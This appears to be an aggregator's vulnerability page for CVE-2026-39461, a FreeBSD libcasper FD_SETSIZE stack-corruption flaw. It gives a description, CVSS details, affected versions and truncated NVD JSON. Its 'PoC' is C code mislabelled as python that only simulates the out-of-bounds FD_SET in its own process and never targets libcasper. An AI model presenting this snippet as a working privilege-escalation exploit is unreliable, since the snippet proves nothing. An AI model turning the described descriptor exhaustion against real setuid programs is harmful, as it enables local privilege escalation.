Security Vulnerability Report
中文
CVE-2026-39461 CVSS 8.8 HIGH

CVE-2026-39461

Published: 2026-05-21 10:16:25
Last Modified: 2026-05-21 19:01:36
Source: [email protected]

Description

libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)'s descriptor set size limit of FD_SETSIZE (1024). An attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:freebsd:freebsd:14.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p12:*:*:*:*:*:* - VULNERABLE
FreeBSD (使用libcasper的版本, 参见FreeBSD-SA-26:22)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-39461: libcasper FD_SETSIZE Stack Corruption * This code demonstrates the condition required to trigger the vulnerability: * exhausting file descriptors to force an FD >= 1024. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/select.h> #include <fcntl.h> #include <errno.h> #define LIMIT 1024 int main() { fd_set read_set; int i; int pipes[LIMIT][2]; printf("[*] Attempting to exhaust file descriptors up to %d...\n", LIMIT); // Step 1: Open many file descriptors to push the counter for (i = 0; i < LIMIT; i++) { if (pipe(pipes[i]) == -1) { if (errno == EMFILE) { printf("[!] Reached file descriptor limit at %d.\n", i); } else { perror("pipe"); } break; } } // Step 2: Hypothetical vulnerable scenario // Assume a new socket is created here by libcasper, getting fd >= 1024 int vulnerable_fd = LIMIT; printf("[*] Simulating vulnerable FD_SET on fd %d...\n", vulnerable_fd); FD_ZERO(&read_set); // VULNERABILITY: libcasper does not check if vulnerable_fd < FD_SETSIZE // This writes out of bounds on the stack FD_SET(vulnerable_fd, &read_set); printf("[+] If this were a setuid process using libcasper, stack corruption occurred.\n"); // Cleanup for (int j = 0; j < i; j++) { close(pipes[j][0]); close(pipes[j][1]); } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39461", "sourceIdentifier": "[email protected]", "published": "2026-05-21T10:16:25.320", "lastModified": "2026-05-21T19:01:35.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)'s descriptor set size limit of FD_SETSIZE (1024).\n\nAn attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:-:*:*:*:*:*:*", "matchCriteriaId": "9DC7C54E-58AF-4ADE-84AF-0EF0F325E20E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p1:*:*:*:*:*:*", "matchCriteriaId": "D3D22B8C-36CF-4800-9673-0B0240558BDD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p10:*:*:*:*:*:*", "matchCriteriaId": "7296F5AA-F8C1-4277-A4EE-C2B24073A320"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p11:*:*:*:*:*:*", "matchCriteriaId": "C30E4A9C-0594-4F40-92B3-26CB9AA85AE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p12:*:*:*:*:*:*", "matchCriteriaId": "9F83F91B-587A-433C-99DB-0D63E267FF16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p13:*:*:*:*:*:*", "matchCriteriaId": "44B9C2FC-756E-459F-8E68-C2C2B8C258AC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p2:*:*:*:*:*:*", "matchCriteriaId": "242FA2A8-5D7D-4617-A411-2651FF3A3E4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p3:*:*:*:*:*:*", "matchCriteriaId": "40573F60-F3B7-4AEC-846A-B08E5B7D9D00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p4:*:*:*:*:*:*", "matchCriteriaId": "1FB832CE-0A98-44A2-8BAC-CD38A64279B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p5:*:*:*:*:*:*", "matchCriteriaId": "9A785F8E-C218-41AE-8D57-BF06DDAEF7CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p6:*:*:*:*:*:*", "matchCriteriaId": "C3909FDD-B2A2-45B6-A40B-1D303A717F15"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p7:*:*:*:*:*:*", "matchCriteriaId": "720597A2-F181-46E1-8A0D-097E17ADC4FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p8:*:*:*:*:*:*", "matchCriteriaId": "DC8A75D0-148A-427A-9783-45477EABED21"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.3:p9:*:*:*:*:*:*", "matchCriteriaId": "F5D39FC9-6DBA-46C8-BB80-A6188E6A8527"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:-:*:*:*:*:*:*", "matchCriteriaId": "8F3856BE-666F-4FA1-A6AD-FE179CEBF1E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:p1:*:*:*:*:*:*", "matchCriteriaId": "D9CC0037-3282-42C3-80D8-F6C1D43B9332"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:p2:*:*:*:*:*:*", "matchCriteriaId": "1EADA828-3C20-43C0-A0CA-3AC7D7F23DBD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:p3:*:*:*:*:*:*", "matchCriteriaId": "53D73FD2-4B06-47D3-BA2A-4363E9DE3565"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:p4:*:*:*:*:*:*", "matchCriteriaId": "D726890B-E679-43A9-A211-D5C05BBE3941"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:14.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "0342A715-E211-4AF6-97ED-32EB9EBB947D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:15.0:-:*:*:*:*:*:*", "matchCriteriaId": "368CFE5D-C5C2-42AF-AAF4-28DFE1A59C3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:15.0:p1:*:*:*:*:*:*", "matchCriteriaId": "AA4AAA57-70A7-4717-ACF2-A253E757FF2C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:15.0:p2:*:*:*:*:*:*", "matchCriteriaId": "E24ABFA6-4D12-4DE5-832B-438502C7D188"}, {"vulnerable": true, "criteria": "cpe:2.3:o:freebsd:freebsd:15.0:p3:*:*:*:*:*:*", "matchCriteriaId": "C1C9869C-494B-4628-9AA3-4AA5B989C377"}, {"vulnerabl ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.